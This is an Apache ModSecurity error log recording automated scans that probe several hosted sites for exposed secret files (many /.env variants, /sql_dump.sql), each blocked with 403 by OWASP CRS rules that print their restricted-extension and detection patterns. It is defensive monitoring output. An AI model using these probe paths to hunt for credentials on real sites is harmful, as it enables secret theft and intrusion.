[Mon May 11 11:34:38.924349 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:2640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGirBjZymfuKpjWXeh24gAAAMs"]
[Mon May 11 11:34:38.968309 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:2656] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/sql_dump.sql"] [unique_id "agGirkYQeUtAPynIs6xSugAAAAM"]
[Mon May 11 11:34:38.969298 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:2656] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sql_dump.sql"] [unique_id "agGirkYQeUtAPynIs6xSugAAAAM"]
[Mon May 11 11:34:42.700193 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:2656] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGirkYQeUtAPynIs6xSugAAAAM"]
[Mon May 11 11:34:44.185021 2026] [authz_core:error] [pid 1254212:tid 1254214] [client 88.88.156.124:45442] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 11:34:45.585298 2026] [security2:error] [pid 1254328:tid 1254349] [client 34.130.67.190:42954] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/app/.env.local"] [unique_id "agGitURdw2n9wv6Ai48CBgAAAJM"]
[Mon May 11 11:34:45.585531 2026] [security2:error] [pid 1254328:tid 1254349] [client 34.130.67.190:42954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/app/.env.local"] [unique_id "agGitURdw2n9wv6Ai48CBgAAAJM"]
[Mon May 11 11:34:45.705968 2026] [authz_core:error] [pid 1254212:tid 1254214] [client 88.88.156.124:45442] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 11:34:46.945778 2026] [security2:error] [pid 1254179:tid 1254193] [client 34.130.67.190:42962] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/admin/.env"] [unique_id "agGitmS6k_SCYd1AVZqpCAAAAQw"]
[Mon May 11 11:34:46.945978 2026] [security2:error] [pid 1254179:tid 1254193] [client 34.130.67.190:42962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/admin/.env"] [unique_id "agGitmS6k_SCYd1AVZqpCAAAAQw"]
[Mon May 11 11:34:47.381709 2026] [security2:error] [pid 1254133:tid 1254144] [client 34.130.67.190:42974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/app/.env"] [unique_id "agGitxjZymfuKpjWXeh3AgAAAMg"]
[Mon May 11 11:34:47.381943 2026] [security2:error] [pid 1254133:tid 1254144] [client 34.130.67.190:42974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/app/.env"] [unique_id "agGitxjZymfuKpjWXeh3AgAAAMg"]
[Mon May 11 11:34:47.383464 2026] [security2:error] [pid 1254133:tid 1254140] [client 34.130.67.190:42990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agGitxjZymfuKpjWXeh3AAAAAMQ"]
[Mon May 11 11:34:47.383759 2026] [security2:error] [pid 1254133:tid 1254140] [client 34.130.67.190:42990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agGitxjZymfuKpjWXeh3AAAAAMQ"]
[Mon May 11 11:34:47.404659 2026] [authz_core:error] [pid 1254212:tid 1254214] [client 88.88.156.124:45442] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 11:34:47.516355 2026] [security2:error] [pid 1254328:tid 1254340] [client 34.130.67.190:43016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.docker"] [unique_id "agGit0Rdw2n9wv6Ai48CEAAAAIk"]
[Mon May 11 11:34:47.516619 2026] [security2:error] [pid 1254328:tid 1254340] [client 34.130.67.190:43016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.docker"] [unique_id "agGit0Rdw2n9wv6Ai48CEAAAAIk"]
[Mon May 11 11:34:47.518263 2026] [security2:error] [pid 1254179:tid 1254203] [client 34.130.67.190:43002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.development.local"] [unique_id "agGit2S6k_SCYd1AVZqpEAAAARY"]
[Mon May 11 11:34:47.518458 2026] [security2:error] [pid 1254179:tid 1254203] [client 34.130.67.190:43002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.development.local"] [unique_id "agGit2S6k_SCYd1AVZqpEAAAARY"]
[Mon May 11 11:34:48.001699 2026] [security2:error] [pid 1254242:tid 1254263] [client 34.130.67.190:43018] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.local"] [unique_id "agGit74KNmD_mZ_vlf8zGQAAAFI"]
[Mon May 11 11:34:48.001963 2026] [security2:error] [pid 1254242:tid 1254263] [client 34.130.67.190:43018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.local"] [unique_id "agGit74KNmD_mZ_vlf8zGQAAAFI"]
[Mon May 11 11:34:48.111183 2026] [security2:error] [pid 1254328:tid 1254399] [client 34.130.67.190:43048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.dev"] [unique_id "agGiuERdw2n9wv6Ai48CEQAAAI4"]
[Mon May 11 11:34:48.111441 2026] [security2:error] [pid 1254328:tid 1254399] [client 34.130.67.190:43048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.dev"] [unique_id "agGiuERdw2n9wv6Ai48CEQAAAI4"]
[Mon May 11 11:34:48.119350 2026] [security2:error] [pid 1254133:tid 1254157] [client 34.130.67.190:43032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.dev.local"] [unique_id "agGiuBjZymfuKpjWXeh3AwAAANU"]
[Mon May 11 11:34:48.119584 2026] [security2:error] [pid 1254133:tid 1254157] [client 34.130.67.190:43032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.dev.local"] [unique_id "agGiuBjZymfuKpjWXeh3AwAAANU"]
[Mon May 11 11:34:49.097500 2026] [authz_core:error] [pid 1254212:tid 1254214] [client 88.88.156.124:45442] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 11:34:56.711522 2026] [security2:error] [pid 1254133:tid 1254140] [client 34.130.67.190:42990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGitxjZymfuKpjWXeh3AAAAAMQ"]
[Mon May 11 11:34:56.712346 2026] [security2:error] [pid 1254328:tid 1254349] [client 34.130.67.190:42954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGitURdw2n9wv6Ai48CBgAAAJM"]
[Mon May 11 11:34:56.827777 2026] [security2:error] [pid 1254242:tid 1254263] [client 34.130.67.190:43018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGit74KNmD_mZ_vlf8zGQAAAFI"]
[Mon May 11 11:34:56.871562 2026] [security2:error] [pid 1254328:tid 1254340] [client 34.130.67.190:43016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGit0Rdw2n9wv6Ai48CEAAAAIk"]
[Mon May 11 11:34:56.927973 2026] [security2:error] [pid 1254179:tid 1254193] [client 34.130.67.190:42962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGitmS6k_SCYd1AVZqpCAAAAQw"]
[Mon May 11 11:34:56.927980 2026] [security2:error] [pid 1254179:tid 1254203] [client 34.130.67.190:43002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGit2S6k_SCYd1AVZqpEAAAARY"]
[Mon May 11 11:34:56.935229 2026] [security2:error] [pid 1254328:tid 1254399] [client 34.130.67.190:43048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGiuERdw2n9wv6Ai48CEQAAAI4"]
[Mon May 11 11:34:56.985345 2026] [security2:error] [pid 1254133:tid 1254157] [client 34.130.67.190:43032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGiuBjZymfuKpjWXeh3AwAAANU"]
[Mon May 11 11:34:56.985916 2026] [security2:error] [pid 1254133:tid 1254144] [client 34.130.67.190:42974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGitxjZymfuKpjWXeh3AgAAAMg"]
[Mon May 11 11:34:58.209092 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:47438] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.prod5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/src/.env.prod5"] [unique_id "agGiwr4KNmD_mZ_vlf8zKgAAAFg"]
[Mon May 11 11:34:58.210587 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:47438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/src/.env.prod5"] [unique_id "agGiwr4KNmD_mZ_vlf8zKgAAAFg"]
[Mon May 11 11:34:59.389500 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:47438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiwr4KNmD_mZ_vlf8zKgAAAFg"]
[Mon May 11 11:34:59.415770 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:47444] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.prod5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/src/.env.prod5"] [unique_id "agGiw0YQeUtAPynIs6xS8AAAAAk"]
[Mon May 11 11:34:59.416070 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:47444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/src/.env.prod5"] [unique_id "agGiw0YQeUtAPynIs6xS8AAAAAk"]
[Mon May 11 11:35:01.511552 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:47444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiw0YQeUtAPynIs6xS8AAAAAk"]
